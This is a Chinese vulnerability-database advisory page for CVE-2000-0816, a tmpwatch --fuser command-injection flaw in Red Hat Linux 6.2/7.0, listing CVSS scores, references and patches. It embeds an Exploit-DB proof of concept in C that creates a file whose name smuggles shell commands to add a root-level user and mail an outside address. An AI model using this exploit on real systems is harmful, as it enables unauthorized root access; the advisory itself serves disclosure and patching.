CVE-2000-0816
CVSS2.1
发布时间 :2000-10-06 00:00:00
修订时间 :2008-09-10 15:05:54
NMCOE    

[原文]Linux tmpwatch --fuser option allows local users to execute arbitrary commands by creating files whose names contain shell metacharacters.


[CNNVD]Tmpwatch任意命执行漏洞(CNNVD-200010-001)

        Linux tmpwatch --fuser选项存在漏洞。本地用户通过创建文件名包含shell元字符的文件执行任意命令。

- CVSS (基础分值)

CVSS分值: 2.1 [轻微(LOW)]
机密性影响: NONE [对系统的机密性无影响]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: NONE [对系统可用性无影响]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: LOCAL [漏洞利用需要具有物理访问权限或本地帐户]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/o:redhat:linux:6.2::alpha
cpe:/o:redhat:linux:6.2::sparc
cpe:/o:redhat:linux:6.2::i386
cpe:/o:redhat:linux:7.0Red Hat Linux 7.0

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0816
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2000-0816
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200010-001
(官方数据源) CNNVD

- 其它链接及资源

http://xforce.iss.net/alerts/advise64.php
(VENDOR_ADVISORY)  ISS  20001006 Insecure call of external programs in Red Hat Linux tmpwatch
http://xforce.iss.net/xforce/xfdb/5320
(UNKNOWN)  XF  linux-tmpwatch-fuser(5320)
http://www.securityfocus.com/bid/1785
(UNKNOWN)  BID  1785
http://www.redhat.com/support/errata/RHSA-2000-080.html
(UNKNOWN)  REDHAT  RHSA-2000:080
http://www.linux-mandrake.com/en/security/MDKSA-2000-056.php3?dis=7.1
(UNKNOWN)  MANDRAKE  MDKSA-2000:056

- 漏洞信息

Tmpwatch任意命执行漏洞
低危 输入验证
2000-10-06 00:00:00 2005-05-02 00:00:00
本地  
        Linux tmpwatch --fuser选项存在漏洞。本地用户通过创建文件名包含shell元字符的文件执行任意命令。

- 公告与补丁

        Do not use the --fuser or -s options with tmpwatch.
        Red Hat:
        Red Hat has issued the following RPMs that contain fixes for this vulnerability.
        Red Hat Linux 6.2:
        alpha:
        ftp://updates.redhat.com/6.2/alpha/tmpwatch-2.6.2-1.6.2.alpha.rpm
        sparc:
        ftp://updates.redhat.com/6.2/sparc/tmpwatch-2.6.2-1.6.2.sparc.rpm
        i386:
        ftp://updates.redhat.com/6.2/i386/tmpwatch-2.6.2-1.6.2.i386.rpm
        sources:
        ftp://updates.redhat.com/6.2/SRPMS/tmpwatch-2.6.2-1.6.2.src.rpm
        Red Hat Linux 7.0:
        i386:
        ftp://updates.redhat.com/7.0/i386/tmpwatch-2.6.2-1.7.i386.rpm
        sources:
        ftp://updates.redhat.com/7.0/SRPMS/tmpwatch-2.6.2-1.7.src.rpm
        Immunix:
        Immunix OS 6.2 (StackGuarded
        versions of the RedHat packages.) They can be found at:
        http://www.immunix.org:8080/ImmunixOS/6.2/updates/RPMS/tmpwatch-2.6.2-1.6.2_StackGuard.i386.rpm
        or
        http://www.immunix.org:8080/ImmunixOS/6.2/updates/SRPMS/tmpwatch-2.6.2-1.6.2_StackGuard.src.rpm
        Trustix:
        All users of TSL should upgrade to the new rpm:
        tmpwatch-2.6.2-1tr.i586.rpm (MD5sum: 3200b3812bfe6e87f326e240fed0686a)
        This file can be found at:
        http://www.trustix.net/download/Trustix/updates/1.1/RPMS/
        or
        ftp://ftp.trustix.com/pub/Trustix/updates/1.1/RPMS/

- 漏洞信息 (20285)

RedHat 6.2/7.0 Tmpwatch Arbitrary Command Execution Vulnerability (EDBID:20285)
linux local
2000-10-06 Verified
0 X-Force
N/A [点击下载]
source: http://www.securityfocus.com/bid/1785/info

A vulnerability exists in tmpwatch, a utility which automates the removal of temporary files in unix-like systems. An optional component of tmpwatch, fuser, improperly handles arguments to system() library calls. If an attacker creates a file with a maliciously-constructed filename including shell meta characters, and -fuser is run on this file, the attacker may be able to execute arbitrary commands, potentially compromising superuser access if tmpwatch is run with root privileges.

#include <stdio.h>

int main()
{
   FILE *f;
   char filename[100] = ";useradd -u 0 -g 0 haks0r;mail 
haks0r@somehost.com<blablabla";

   if((f = fopen(filename, "a")) == 0) {
      perror("Could not create file");
      exit(1);
   }
   close(f);
}		

- 漏洞信息

1603
Linux tmpwatch fuser Option Arbitrary Command Execution
Local Access Required
Loss of Integrity
Exploit Public

- 漏洞描述

- 时间线

2000-10-06 Unknow
2000-10-06 Unknow

- 解决方案

Products

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站